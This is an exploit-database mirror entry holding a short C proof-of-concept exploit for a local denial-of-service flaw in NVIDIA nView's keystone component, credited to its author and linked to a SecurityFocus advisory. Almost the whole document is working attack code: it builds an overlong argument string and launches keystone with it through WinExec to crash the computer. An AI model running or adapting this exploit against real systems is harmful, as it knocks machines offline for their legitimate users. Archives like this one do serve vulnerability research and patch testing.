exploit-db-mirror/exploits/windows/dos/29170.c
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

40 lines
No EOL
843 B
C

source: http://www.securityfocus.com/bid/21260/info
NVIDIA nView is prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
/*
NVIDIA nView (keystone) local Denial Of service
(c)oded By Hessam-x / www.Hessamx.net
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{
char junk[] = "a";
char box[650];
char *buf;
int i;
printf("-:: NVIDIA nView (keystone) Denial Of service \n");
printf("-:: Coded By Hessam-x / www.hessamx.net \n");
strcpy(box,"a");
for (i = 0; i < 600; i++) {
strcat(box,junk);
}
buf = (char *) malloc(650);
strcpy (buf,"keystone\t");
strcat (buf,box);
buf[650-1]='\0';
WinExec(buf,0);
free(buf);
}